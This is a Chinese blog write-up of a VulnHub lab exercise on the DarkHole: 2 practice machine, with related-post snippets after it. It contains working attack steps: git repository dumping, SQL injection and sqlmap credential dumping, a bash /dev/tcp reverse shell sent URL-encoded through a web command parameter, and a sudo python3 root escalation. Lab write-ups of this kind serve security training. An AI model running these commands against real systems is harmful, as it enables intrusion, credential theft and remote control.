DarkHole_2打靶记录

最新推荐文章于 2024-04-14 01:04:27 发布
最新推荐文章于 2024-04-14 01:04:27 发布
阅读量166 收藏 1
点赞数
分类专栏: 打靶记录 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwd180/article/details/131206137
版权

实验主机:攻击机kali 靶机DarkHole

实验目标:取得 root 权限 + 2 Flag

实验网络:桥接模式

攻击方法:

  • 主机发现
  • 端口扫描
  • 信息收集
  • Git 库泄漏
  • SQL注入
  • 本地端口转发
  • 本地信息收集
  • 密码爆破
  • 水平提权
  • Root提权1、2

靶机下载地址:DarkHole: 2 ~ VulnHub

环境部署:

1.使用VMware Workstation打开靶机并将网卡改为桥接模式

2.打开并配置好自己的kali网卡也为桥接...

一:信息收集

1.使用nmap进行主机发现

nmap -sT 192.168.3.0/24

这里发现开放22 80端口在浏览器访问

2.目录扫描

dirb http://192.168.3.5

访问http://192.168.3.5/.git

看到了“COMMIT_EDITMSG”(最后一次提交数据时的描述文件),说明这是一个git库,那就下载下来看看里里面都是什么吧

3.使用git-dumper分析git文件

1) 安装git-dumper

pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn git-dumper

2)下载git文件到temp目录下

git-dumper http://192.168.3.5/.git/ temp

mkdir temp  #桌面新建temp文件夹
chmod 777 temp

3)查看更新日志

cd temp
ls -al
git log

我们发现有三次提交,可以使用Diff查看提交的区别

git diff a4d900a8d85e8938d3601f3cef113ee293028e10

4)用得到的账号密码进行登录

二:漏洞探测及利用

1)在url出有id=1的字段,那么就可能存在SQL注入

在id=1后加' 页面回显空白

2)判断闭合id=1'--+

页面回显正常

3)判断字段数

http://192.168.3.5/dashboard.php?id=1' order by 7 --+	//报错
http://192.168.3.5/dashboard.php?id=1' order by 6 --+	//正常

4)手注太麻烦直接上工具吧

python sqlmap.py -u "http://192.168.3.5/dashboard.php?id=1" --cookie="PHPS
ESSID=o51nbqppq5pgaa4rcc7534fm3h" --batch --dbs #爆数据库名
python sqlmap.py -u "http://192.168.3.5/dashboard.php?id=1" --cookie="PHPSESSID=o51nbqppq5pgaa4rcc7534fm3h" --batch -D darkhole_2 --tables  #爆表名
python sqlmap.py -u "http://192.168.3.5/dashboard.php?id=1" --cookie="PHPSESSID=o51nbqppq5pgaa4rcc7534fm3h" --batch -D darkhole_2 -T ssh --columns  #爆字段
python sqlmap.py -u "http://192.168.3.5/dashboard.php?id=1" --cookie="PHPSESSID=o51nbqppq5pgaa4rcc7534fm3h" --batch -D darkhole_2 -T ssh -C "user,pass" --dump  #爆字段内容

5)爆破结束尝试进行ssh登录

ssh jehad@192.168.3.5

三:提权

1)cat /etc/passwd | grep "/bin/bash"

具有 /bin/bash 的用户除了 root 外 有: lama, jehad, losy 

2)查看历史命令记录

cat .bash_history

本地开放9999端口服务

3)查看9999端口状态

ss -antp

4)判断该端口网站用户

 curl "http://127.0.0.1:9999/?cmd=id"

5)重新连接ssh进行端口映射

ssh jehad@192.168.3.5 -L 9999:localhost:9999

6)构造连接kali命令并进行编码

bash -c 'bash -i >& /dev/tcp/192.168.3.5/7777 0>&1'

bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.5%2F7777%200%3E%261'

7) kali开启监听将构造好的语句在浏览器访问

http://127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.5%2F7777%200%3E%261'

成功拿到losy权限....

8) 查看历史命令记录

cat .bash_history

发现密码泄露以及存在python环境...

9) ssh连接losy用户

10)获取root权限

sudo -l
sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
whoami
ls
cat user.txt

fmixil
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shoot.zip_MATLAB打靶法_matlab打靶_二阶非线性常微分方程求解_打靶法_非线性 打靶
07-15
试用打靶法求二阶非线性常微分方程两点边值的数值解,用Matlab编程计算,并给出一些例子,验证你的算法与程序的正确性。
shooting.rar_MATLAB打靶法_matlab 打靶法_shooting method_shooting matl
07-14
shooting 打靶法,MATLAB编程,仅供参考。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1),2024互联网大厂网络安全面经合集
最新发布
2301_77116622的博客
04-14 857
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2
Aluxian_的博客
05-31 864
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3072
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
靶机通关 | DarkHole_2靶机通关秘籍~
鱼溯的博客
10-11 188
靶机通关 | DarkHole_2靶机通关秘籍~
DarkHole_2
追求卓越,技术流~
01-14 1470
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 1975
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 157
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
DARKHOLE 2
Czheisenberg的博客
02-18 602
vulnhub靶场——DarkHole 2 WriteUp
VulnHub靶机渗透实战8-darkhole-2
随心所欲不逾矩
11-22 1332
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:lush@admin.com,密码:321.
lsq.rar_LSQ wireless_boundary problem_shooting method_打靶_打靶
09-19
打靶法求微分方程边值问题,这是数学上的求取方程问题的边值的方法
daodan.rar_daodan_missile_蒙特卡洛导弹_蒙特卡洛打靶_蒙特卡洛试验
09-24
基于c++的运用蒙特卡洛法导弹打靶试验仿真代码
Shootmethod.zip_shooting_打靶法_方程
07-14
打靶法解算微分方程,该方程可以解算再一直终点状态的情况下解算微分方程
DARKHOLE: 2
weixin_45042115的博客
10-05 1874
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
darkhole2
qq_62144749的博客
09-02 421
vulnhub darkhole2
靶机-DarkHole_2
weixin_58602402的博客
06-14 154
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。方法一:wget -r http://192.168.12.168/.git/10.先ssh进行登录losy/gang,根据获取的命令利用python调sh。3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露。1.主机发现,发现靶机ip:192.168.12.168。4.到查找到的目录下查看,发现webshell文件。爆内容,发现用户和密码:jehad/fool。1.用获得的用户和密码进行ssh登录。
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 943
VulnHub-DarkHole: 2靶机详细渗透过程
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1266
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
openmv激光打靶
07-27
根据引用\[2\]和引用\[3\]中提到的内容,OpenMV可以通过色块识别来识别激光点的位置。为了能够看清激光点,需要对图像进行一定的处理,比如调节曝光度和激光点色域的调节。在初始化代码中,可以设置曝光度和阈值来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值